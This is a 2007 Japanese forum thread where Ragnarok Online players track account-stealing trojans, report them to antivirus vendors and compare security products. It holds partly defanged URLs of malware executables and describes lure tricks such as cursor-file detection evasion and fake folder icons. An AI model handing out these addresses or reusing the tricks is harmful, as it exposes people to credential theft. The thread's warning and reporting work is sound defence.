932 名前:(^ー^*)ノ〜さん :07/04/23 22:01 ID:WGsznVtv0
掲示板へのリンクだから、直接アップされた物へのリンクでないにしても
.は■にして置いた方が良いね、テンプレ読んでるなら尚更

933 名前:(^ー^*)ノ〜さん :07/04/23 22:01 ID:ruWIUEtw0
>>930
アドレス直に張るなよ阿保・・・

934 名前:(^ー^*)ノ〜さん :07/04/23 22:06 ID:F9K3aul00
とりあえず右クリ保存からメモ帳で開き、その後ペイントで見てみてソースチェッカーにもかけたが、
特に何もないjpgだったと思う

935 名前:(^ー^*)ノ〜さん :07/04/23 22:10 ID:KZ3HEdWx0
ただの画像じゃん…。LiveRO行け。

936 名前:(^ー^*)ノ〜さん :07/04/23 22:10 ID:tkq7AiXL0
>>930
それはただの痛い発言のSSでした。

937 名前:(^ー^*)ノ〜さん :07/04/23 22:48 ID:KZ3HEdWx0
rormbのキチガイJavaScriptいじり終えた。
aniカーソルが変なASP経由で落ちてくる(なぜかクッキーを食べさせられる)。
カーソル指定でさらに何かをするとウイルス対策ソフトのani検知をすり抜けられるってのを
最近何かで見たので、それ狙いか? WindowsUpdateで塞いでいれば問題ないはず。

あとiframeで /onlinecount/tt.htm を呼ぶ。
こちらもキチガイJavaScriptで、これ自身が
見慣れたActiveXコントロール使うVBScriptを生成する。

938 名前:(^ー^*)ノ〜さん :07/04/23 22:50 ID:KZ3HEdWx0
で、aniとVBSが拾うトロイはいずれも /onlinecount/tj.exe 。
オンラインスキャナに投げたところNortonもMcAfeeもバスターもスルー。
BEP(BeRo)圧縮で正体はよくわからないけど、ドメインからしてRO狙いと思われる
(Lineage用にはlinbbsやlinrmbといったドメインを持っている)。

なおaniの中に「KASPERSKY」の文字列がいくつもある。
おそらく挑発だろう(でも検知した。神速で対応されたものと思われる)。
構造もいつものlovetw系(z1.jpgとz2.jpg)より新しい
(URIが末尾ではなく先頭のほうにある)。

939 名前:(^ー^*)ノ〜さん :07/04/23 23:01 ID:KZ3HEdWx0
スルー組のうち主だったところ(上記に加えてAvast!とBitDefender)に
検体発射しました。

940 名前:(^ー^*)ノ〜さん :07/04/23 23:34 ID:tkq7AiXL0
>>938
調査乙。

NOD32では、その tj.exe は、Win32/PSW.Lineage.DN トロイの亜種 と検知されました。

941 名前:(^ー^*)ノ〜さん :07/04/24 02:32 ID:RQWq4vos0
>>937
>クッキー
検体チェック者を特定して、ip指定で遮断してくるつもりか。
はたまた、非ブラウザのアクセスを蹴る為だろうか。

942 名前:(^ー^*)ノ〜さん :07/04/24 07:37 ID:lCLeqSoR0
>>580 のトロイ差し替え。
www■gomeodc■com/mmkk■com (実質exe)
www■vviccd520■com/img/mmdd.exe
WinRAR自己解凍でトロイの22.exe(とエロ写真の1.jpg。18歳未満は見ちゃだめ)。
両者の違いはエロ画像のみ、トロイは同一なのでお好きなほうをどうぞ
(やたら重いというか切れるのでダウンローダ推奨。500kB以上あります)。

943 名前:(^ー^*)ノ〜さん :07/04/24 08:17 ID:DITBvC0M0
>>942
報告乙。両ファイルとも、NOD32ですり抜けるのを確認。検体提出行ってきます。
新手のダウンローダですね。

画像用あぷろだにでも置いて、ファイルサイズ大きいから画像だと誤認させて、踏ませるのが目的かな。

944 名前:(^ー^*)ノ〜さん :07/04/24 08:34 ID:lCLeqSoR0
ググったところ台湾向けなのかなぁ。
日本のサイトが引っかからない。
とりあえず地元ってことでトレンドマイクロに送った。

945 名前:(^ー^*)ノ〜さん :07/04/24 08:52 ID:DITBvC0M0
>>942 一部補足
WinRAR形式ではなく、ZIPの自己解凍のようですね。PEiDで圧縮形式を確認した所、
UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo [ZIP SFX]
となっていましたし、他の解凍ツール開いても、Deflateとなっていました。

LiveROに上がっていた検体提出先に、まとめて送信中。

946 名前:(^ー^*)ノ〜さん :07/04/24 09:05 ID:lCLeqSoR0
あ、すまんかった。解凍ソフトに突っ込んだのでよく見てなかった。

947 名前:(^ー^*)ノ〜さん :07/04/24 09:34 ID:DITBvC0M0
カスペから返答。>>942は既に検知できるらしい。

22.exe_, mmdd.exe_, mmkk.com_ - Trojan-PSW.Win32.Nilage.bjd
These files are already detected. Please update your antivirus bases.

マカフィーはmalwareとしての返答はあったけど、保留中になってるので、パターンへの反映はこれからの模様。
NOD32はすり抜けるので、対応待ち。他は対応してるものとしてないものがちらほら。(以下省略)

948 名前:(^ー^*)ノ〜さん :07/04/24 15:17 ID:VySuS8cj0
別PC(ROはインストールしていないPC)でrom776.comの
キャッシュページを踏んでしまったのですが、
キャッシュなら問題ないのでしょうか。
【  アドレス   】 rom776■com のキャッシュ
【踏んだ日にち】 今日の14時ごろ?
【     OS    】 windows XP
【使用ブラウザ 】 IE5以上・・だと思う
【WindowsUpdateの有無】最新のものにしてあります
【 アンチウイルスソフト 】 ウィルスバスター
【その他のSecurty対策 】 わかりません
【 ウイルススキャン結果】 まだ実行していません
【スレログやテンプレを読んだか】 YES
【説明】
ROをインストールしていない別PCで、上記アドレスのキャッシュを踏んでしまった
のですが
(YAHOOでROM776を
検索したところ、出てきたのですが、怪しいと思いキャッシュで見てみた)
キャッシュを見ただけでもウィルス感染はしてしまうのでしょうか?
また、ROをインストールしていない別PCで感染した場合でも、
ROをインストールしているほうのPCのOSを再インストールするべきなのでしょうか。
質問攻めで申し訳ありません…

949 名前:(^ー^*)ノ〜さん :07/04/24 17:28 ID:RQWq4vos0
>>948
所謂iframe対策としては、キャッシュ参照は全くの無意味。
オリジナルのhtmlに、機械的にヘッダを付記しているに過ぎないから。

それとは別に、そのサイト自体は、現時点で悪意らしきものは見受けられない。
どちらかというと、SEO手法か、DoubleClick的な情報収集目的の様に思われる。

950 名前:(^ー^*)ノ〜さん :07/04/24 18:20 ID:SCRzM2eh0
トレンドマイクロに>>942の検体(↓)3種を送っておきました。
・www■gomeodc■com/mmkk■com
・www■vviccd520■com/img/mmdd■exe
・上記2つの中に仕込まれてる22.exe

>>938の検体(↓)は対応したらしく、バスターで検出できるようになってました。
・www■rormb■com/onlinecount/tj■exe  (ウイルス名:TSPY_ONLINEG.ALE)

951 名前:950 :07/04/24 18:26 ID:SCRzM2eh0
そういえば、mmdd.exeのアイコンがフォルダと同じ(良く見るとちょっと画が荒い)で、危うく実行するところだった。
そんな子供だましな罠もあると事前に知ってはいたけど、いざやられると意外と気付きにくいものだなあ。

952 名前:(^ー^*)ノ〜さん :07/04/25 01:50 ID:Fby6T6Vn0
それはウィルスでよくある手だ。
exeの前に長い空白入れて端からはみ出させとくとかもな。

953 名前:(^ー^*)ノ〜さん :07/04/25 02:43 ID:jFxo9NTv0
youjo .exe

954 名前:(^ー^*)ノ〜さん :07/04/25 05:51 ID:4oOu2ehp0
soultakerbbs■net/******(6桁数字)/
またこのドメイン+6桁数字があちこちに貼られてきてるねー。
スカッとパンヤの公式BBSにもはってあって、何人も踏んでいるもよう;;
ゾンビPCとかになってないことを祈るばかり。

一応公式意見フォームにて、該当スレの削除と安易にURL踏まないように注意勧告、
ウィルスチェック等かけるように勧告して欲しいと依頼してきた。

955 名前:(^ー^*)ノ〜さん :07/04/25 08:53 ID:G7xMSYSQ0
www■blog-livedoor■net/boss/
(スクリプトは略)
www■blog-livedoor■net/boss/mangame.exe
ディレクトリやスクリプトは以前からあったのに
exeを設置していなかったもの。
nPack圧縮のため対応していない物も多いと思われます。

またUpack圧縮Maranも検知しにくい物に差し替えられております。
www■jpxpie6-7net■com/web/read_cgi/svchost.exe
など、いくつか確認。

>>954
数字といえどURIの一部なのに伏せられると確認のしようもない。

956 名前:(^ー^*)ノ〜さん :07/04/25 09:13 ID:XyEv0Jlt0
>>955
NOD32では、Maronの亜種として検知。
カスペオンラインスキャンでファイル単体指定してみたが、2つともすり抜け。ちょっと検体提出行って来る。

957 名前:(^ー^*)ノ〜さん :07/04/25 09:21 ID:G7xMSYSQ0
Mar「a」nね。

958 名前:(^ー^*)ノ〜さん :07/04/25 09:49 ID:XyEv0Jlt0
失礼。検体提出時の検出名はちゃんとコピペしたので間違ってない筈。各社への検体提出完了しますた。
検出できるの送られた会社の担当者様ごめんなさい。

959 名前:(^ー^*)ノ〜さん :07/04/25 10:03 ID:XyEv0Jlt0
カスペから返答。>>956は新種のマルウェアなので次回updateで対応とのこと。
>Hello.
>New malicious software was found in the attached file.
>It's detection will be included in the next update as Trojan-PSW.Win32.Maran.cj. Thank you for your help.

960 名前:(^ー^*)ノ〜さん :07/04/25 11:20 ID:r5wdakhb0
>>955の検体1種(下記)をトレンドマイクロに送りました。
www■blog-livedoor■net/boss/mangame■exe

下記の検体はバスターで検出可でした。
www■jpxpie6-7net■com/web/read_cgi/svchost■exe  (ウイルス名:TSPY_MARAN.D)

961 名前:(^ー^*)ノ〜さん :07/04/25 11:45 ID:MPMJ0lSm0
しかし、カスペってスゴイな…すぐに対応してくれる意気込みが。
今まで無料のAVGとか使ってたけど、本気で購入したくなる。

雑談スマヌ。

962 名前:(^ー^*)ノ〜さん :07/04/25 12:16 ID:gazO9zKi0
>>959
対応終わったっぽいね。オンラインスキャナで検知した。

963 名前:(^ー^*)ノ〜さん :07/04/25 13:13 ID:NuNrFjzm0
>>961
バスターが肝心のウィルス見逃す時点でゴミソフト決定したしな
バスター更新の封書きてたけど更新せずにカスペ導入に踏み切るわ
未知のウィルスにすら対応できるのはスゴイよ

964 名前:ばすたーゆーざー :07/04/25 13:39 ID:r5wdakhb0
カスペ恐ろしく対応が速いなあ。たったの3時間で対応するとは・・・
バスターの方は検体送ったけど、返事は原則3営業日以内。
場合によっては1週間前後かかるそうな。
(パターンへの対応がじゃなく、あくまでもサポートの返事がだけどね)

ここ2ヶ月で落とした検体を見る限りは、検出力自体はまずまずだと思ってるけど・・・、
もっとがんばれ!!トレンドマイクロ。

965 名前:(^ー^*)ノ〜さん :07/04/25 14:23 ID:Fby6T6Vn0
バスターみたいな大手のは垢ハックだけに構ってらんないから対応遅いのはしょうがないわな。
そういった意味では規模は小さくても新出の検体にすぐ反応してくれるカスペは垢ハック特化といえるかもね。

966 名前:(^ー^*)ノ〜さん :07/04/25 14:31 ID:ayG8V/sa0
TrendMicroはバグ入りパターンファイルで、多数の法人ユーザーに対して惨事復旧させられたから。
それ以降、専用のテストセンターを設立したりした結果、迅速な対応には向かなくなっている。
それに、垢ハック系マルウェアは、ウィルスのような感染力を持たないトロイ型というのもあるかと。

967 名前:(^ー^*)ノ〜さん :07/04/25 14:32 ID:UmMpkbl10
終わり際とは言えちょい下がりすぎなのであげ

968 名前:(^ー^*)ノ〜さん :07/04/25 14:55 ID:gazO9zKi0
>>965
垢ハックだけに構ってらんないのはKasperskyも変わらんのだが。
PC-cillin(「ウイルスバスター」)の知名度や評価は
日本と台湾以外ではそもそも大したことないよ。

969 名前:(^ー^*)ノ〜さん :07/04/25 15:00 ID:i8Ny1gfr0
米国でもトップシェアソフトは違うし、またヨーロッパでも違うんだな
NOD32もカスペと検出率は遜色ないと思う

中級者向けみたいな評価だけど、実際殆ど設定弄る所ないから初心者向けだと思う
セキュ版の荒れ具合が相当あれだが・・・何より軽いのが○

970 名前:(^ー^*)ノ〜さん :07/04/25 15:11 ID:gazO9zKi0
軽さならDr.WEBのほうがずっと上だけど、こちらは
能力的にはMcAfeeくらいなのでKasperskyやNOD32に一歩譲る。
検出力からしたら恐ろしく軽いな。
もっともファイアウォールが付いてないのも大きいかもしれん
(Outpost等別途必要。次期バージョンで付属すると聞いた)。

ファイルとネットワークは別なんだから別途用意しろ、というのは
おかしくないんだけど、統合スイートばかりなこのご時世では
初心者向けとは言えない。ただでさえNorton360とか変なの出てきてるし。

971 名前:(^ー^*)ノ〜さん :07/04/25 15:15 ID:gazO9zKi0
ってLiveRO向けだな、すまん。

972 名前:(^ー^*)ノ〜さん :07/04/25 15:16 ID:i8Ny1gfr0
FWソフトとか、いちいち報告してくるだけで機能的にはOS標準で間に合ってる気がするのよね
そもそもルーターの方でフィルタできるし、ログ残るし・・・PG2にもログもかなり使える

それを敷居が高いとするならNOD32は使わん方がいいのかもね

973 名前:(^ー^*)ノ〜さん :07/04/25 15:17 ID:i8Ny1gfr0
素で間違えてた・・・スマン

974 名前:(^ー^*)ノ〜さん :07/04/25 15:27 ID:5m9Rb6CI0
セキュ雑談スレより輸入。
住人が被ってるだろうから知ってるとは思うけど、>871の流れから生まれた
hostsの自動更新スクリプトが公開されてる。

>969 名前:936 Mail:sage 投稿日:07/04/25 (水) 01:15 ID:gDGvy1n80
>
>あこすれてんぷら避難所を間借りする事で公開しました。
>ttp://acopri.s250.xrea.com/index.php?hostsRenewScript
>
>一応説明を付けていますが、自己責任、という事でお願いします。
>cfgとvbsの2ファイル構成で、動作に必要なwget等は付属してません。
>
>配布ページとファイルを見て使ってみてください。

実際に使ってみたが、正常に更新してくれる。

配布ページの説明は少々難し目に書かれてて初心者お断りになってるが、ファイルと
併せて見たら、ハマる所は全く無い。
組み方も安全に気を使ったものになっていて、設定をミスった場合何も更新されない。
モノがモノだけに、見かけよりは安全に作られてる。

何ともツンデレ仕様なスクリプトだが、hostsの更新をサボりがちな人には向いてると思う。

975 名前:(^ー^*)ノ〜さん :07/04/25 15:48 ID:XyEv0Jlt0
>>964
あ、このスレではNOD32とカスペを推奨することが多いみたいなので触れなかったけど
トレンドマイクロに送った検体も、Submit Suspicious File/Undetected Malware となって
対応待ちリストにちゃんと入ってるよ。

>>942
NOD32:定義バージョン 2214(20070424)で「Win32/PSW.Lineage.BJD トロイ」として検出される。
これも報告日のパターンで即日対応した模様。圧縮形式fが違うだけだから早く検知できたのかな。

>>970
次スレ依頼忘れてないか〜〜〜〜?

976 名前:(^ー^*)ノ〜さん :07/04/25 15:57 ID:EHVPwyXI0
カスペの対応速度はえーな。

どっかのオンラインゲーム運営会社に爪の垢煎じて飲ませてやりたいくらいだ。
バグを何年も放置とかあるからな^^

977 名前:(^ー^*)ノ〜さん :07/04/25 16:40 ID:XyEv0Jlt0

前スレの使えそうな内容ダイジェストは以上です。他に気付いたものがあったら適宜貼り付けて下さい。

間で連続投稿規制に引っ掛かりました。テンプレにするには長過ぎるってことですね。orz
通称本スレ(?)のテンプレから引用して締めっ。



■スレの性格上、誤って危険なURLがそのまま貼られてしまう可能性がある■
■URLを無闇に踏んで回らないこと。報告・相談はテンプレを利用すること■

※ ID/Pass/サーバ/キャラ名等の情報は公開しないでください
※ このスレは『勇気が無くて見れないサイト解説スレ』ではありません

【参考アドレス】
・ROアカウントハック報告スレのまとめ?サイト
 http://sky.geocities.jp/vs_ro_hack/
・安全の為に (BSWikiより)
 http://smith.xrea.jp/?Security
・リネージュ資料室 (応用可能な情報が多数)
 http://lineage.nyx.bne.jp/

【このスレでよく出てくるアプリケーション】
・PeerGuardian2(設定などはリネージュ資料室内・セキュリティ対策参照)
 ttp://lineage.nyx.bne.jp/misc/security/?id=basic-ipfilter

978 名前:(^ー^*)ノ〜さん :07/04/25 16:42 ID:XyEv0Jlt0
盛大に誤爆すいません。orz

LiveROの方に書込もうとした内容を流しちゃいました。・・・そしてLiveROは連投規制かかった罠。(o_ _)o

979 名前:(^ー^*)ノ〜さん :07/04/25 16:47 ID:gazO9zKi0
>>975
うお、俺だった。依頼してきた。

980 名前:(^ー^*)ノ〜さん :07/04/25 16:50 ID:XyEv0Jlt0
どなたか分かりませんが、転記ありがとうございました。

>>979 依頼乙…というか、1以降のテンプレ書いてないぞ〜。
あと、LiveROの方は新スレ立ったんで、アドレス変更でお願いしまつ。

セキュリティ対策、質問・雑談スレ2
http://enif.mmobbs.com/test/read.cgi/livero/1177485590/

981 名前:(^ー^*)ノ〜さん :07/04/25 16:53 ID:Fby6T6Vn0
>>974
誰でも更新できて業者も見るWIKIにスクリプト置くとかかなりまずいと思う・・・
こういうのが必要な人ってMD5の意味もわからん人たちが対象だし。

982 名前:(^ー^*)ノ〜さん :07/04/25 16:56 ID:BVjZK7Qx0
俺はやっぱ、NOD32のヒューリスティックスキャンは侮れないんだなぁと思う。

983 名前:(^ー^*)ノ〜さん :07/04/25 16:57 ID:Fby6T6Vn0
と思ったら凍結されてるのか。
WIKIのセキュについてはよくわからんがそれなりには安心していいのかな。

984 名前:(^ー^*)ノ〜さん :07/04/25 17:01 ID:5m9Rb6CI0
テンプレの>2-6、そのままでいいのかね?

セキュ雑談スレの新スレは当然含めるにしても、報告テンプレの改定案(>872)や
まとめサイトのPG2の解説ページ(>871)やhosts更新スクリプト(>974)等、変更や
追加した方がいいものがありそうなんだが。

985 名前:(^ー^*)ノ〜さん :07/04/25 17:08 ID:XyEv0Jlt0
>報告テンプレの改定案
この際だし、入れようよ

>まとめサイトのPG2の解説ページ
これはまとめサイトの中の人に、まとめサイトTOPページから、分かりやすいようにして貰えばいいんじゃない?

>hosts更新スクリプト
スレではなく、まとめサイトで(PG2と同じように)紹介するのがいいんじゃないかな。

986 名前:(^ー^*)ノ〜さん :07/04/25 17:24 ID:gazO9zKi0
テンプレ依頼出してきた。カスペ体験版のリンクはジャストシステムに変更。
板の看板にLiveROスレがあるんだけど、あれの変更はどこに依頼出せばいいんだ?

987 名前:(^ー^*)ノ〜さん :07/04/25 17:38 ID:5m9Rb6CI0
>983
あこすれ避難所は3月末ぐらいに開設してから、今まで一度もハクアドの貼り付けや
業者Spamの貼り付けを喰らってないはず。
かなり安全な部類に入る。

>986
管理板の目安箱スレかな?

988 名前:(^ー^*)ノ〜さん :07/04/25 19:31 ID:Fby6T6Vn0
>>987
元のWIKIも残ってるからそっちに流れるだろうしね。対策もそれなりに取ってるのも知ってる。
でもそれは安心する理由にはならない。
できたばっからから被害がないのは当然っちゃ当然だしね。

でも書き換えができないようになってんならまあ安心していいのかな。
添付ファイルの書き換えとかはできるのか知らんけど。

989 名前:(^ー^*)ノ〜さん :07/04/25 19:59 ID:NuNrFjzm0
>>975
だからさ・・・問題なのはその対応速度の速さだろ?

990 名前:(^ー^*)ノ〜さん :07/04/25 20:27 ID:XyEv0Jlt0
>>989
決して遅くはないと思うぞ。
数日以内に対応されるのは早い方だと思う。1週間以内だと普通じゃない?
NOD32とかカスペでも即日対応ではないケースもあるし。

雑談は、ともかく、多分間に合うと思うけど念のため、退避場所を貼り。

【一時】新スレ遅延時避難スレ('05/02/26)【誘導】
http://gemma.mmobbs.com/test/read.cgi/ragnarok/1109367640/

991 名前:964 :07/04/25 20:35 ID:r5wdakhb0
>>975
おー、ありがとう。提出かぶっちゃったけど、まあいっか。
そして、今日配布された新パターンで、以下のファイルは検出可になってます。
・www■gomeodc■com/mmkk■com  (ウイルス名:TSPY_NILAGE.IH)
・www■vviccd520■com/img/mmdd■exe  (ウイルス名:TSPY_NILAGE.HU)

バスターユーザーの人はパターン更新しておきましょう。

992 名前:(^ー^*)ノ〜さん :07/04/25 21:18 ID:AdUQjF8Q0
4月20日と25日にEir板でまた新スレを作って書き込まれていたので一応報告します。
(本文は途中省略してもいいよね?)
----------------------------------------------------------------
RO系コスプレ

1 :ゲーテ:2007/04/20(金) 20:52:17 ID:A5QPqJ5U0
ラグナ系のコスプレをされている方にお尋ねしたいです。
公式絵やキャラ絵などでは、実際に衣装作成するには
情報が不充分であることがとても多いですよね。
皆様、どうやって補完されていますか?
・・・(長いので省略)・・・
よろしくお願いいたします。
http://www■jpxpie6-7net■com/web/read_cgi/
----------------------------------------------------------------
書き込まれたホスト「OFSfb-20p3-53.ppp11.odn.ad.jp」

----------------------------------------------------------------
AAA級 ヴィトン、シャネル... 

1 :玲木辰美:2007/04/25(水) 07:14:31 ID:qrA8dirQ0
AAA級 ヴィトン、シャネル、グッチ、高級腕時計在庫処分価格なのでヴィトン、エルメ

ス、グッチ、シャネルなどが激安です。当店の主要な経営のブランド:Louis Vuitton(

・・・(長いので省略)・・・

★☆★━━━━━━━━━━━━━━★☆★
■URL:http://www■gamesmusic-realcgi■net/web/read_cgi/
■店長:玲木辰美
■連絡先:lysh830525@yahoo■co■jp
★☆★━━━━━━━━━━━━━━★☆★
----------------------------------------------------------------
書き込まれたホスト「OFSfb-22p1-187.ppp11.odn.ad.jp」

ホストが微妙に違うけど、同じPCなのかな?

993 名前:(^ー^*)ノ〜さん :07/04/25 22:20 ID:x//dho9b0
アカウントハック総合対策スレ7
http://gemma.mmobbs.com/test/read.cgi/ragnarok/1177507128/l50
http://gemma.mmobbs.com/test/read.cgi?bbs=ragnarok&key=1177507128&ls=50

994 名前:(^ー^*)ノ〜さん :07/04/25 23:56 ID:/T/gH9jz0
梅ついでに。

>>992
OFSfb-21p4-127.ppp11.odn.ad.jpの件を04/18に通報したんだけど、
今日メールがきてて、『注意喚起を行わせていただきました』だそうで。
同一人物だった場合もっと厳しい処置になるだろうから、通報してみる
のはありかと思われ。

ちなみにOFSfbで特定の地域を指す筈なので同一人物の可能性は
低くは無いと思います。

995 名前:(^ー^*)ノ〜さん :07/04/26 00:01 ID:97PVjrWn0
ofsfb-12p1-64.ppp11.odn.ad.jp
ofsfb-21p3-184.ppp11.odn.ad.jp
ofsfb-23p3-108.ppp11.odn.ad.jp
ofsfb-21p4-156.ppp11.odn.ad.jp

もあるよ

996 名前:(^ー^*)ノ〜さん :07/04/26 00:30 ID:lcsWh9iE0
www■livedoor-game■com/bbs/

掲示板になりすましで書き込みされていた記事に
貼り付けられていたもの

出所は中国の模様
やっちゃったかなぁ

997 名前:(^ー^*)ノ〜さん :07/04/26 00:46 ID:Xwz+SYtR0
>995
それら、黒という意味?
うち2つ、うちのサイトに来た痕跡があったんだが。
幸い罠貼り付けとかは無かったけど。

>996
やっちゃいましたな……
>777で報告されてるように罠ドメイン。

早急にPASS変更と駆除するがよろし。

998 名前:(^ー^*)ノ〜さん :07/04/26 05:43 ID:m8KUbqAG0
OFSfb-21p4-127.ppp11.odn.ad.jp
OFSfb-22p1-187.ppp11.odn.ad.jp

999 名前:(^ー^*)ノ〜さん :07/04/26 07:47 ID:GBjufL9Z0
次立ってるので埋めちゃいますよ〜

1000 名前:(^ー^*)ノ〜さん :07/04/26 07:47 ID:GBjufL9Z0

アカウントハック総合対策スレ7
http://gemma.mmobbs.com/test/read.cgi/ragnarok/1177507128/

1001 名前:1001 :Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。


全部 最新50
DAT2HTML 0.33h Converted.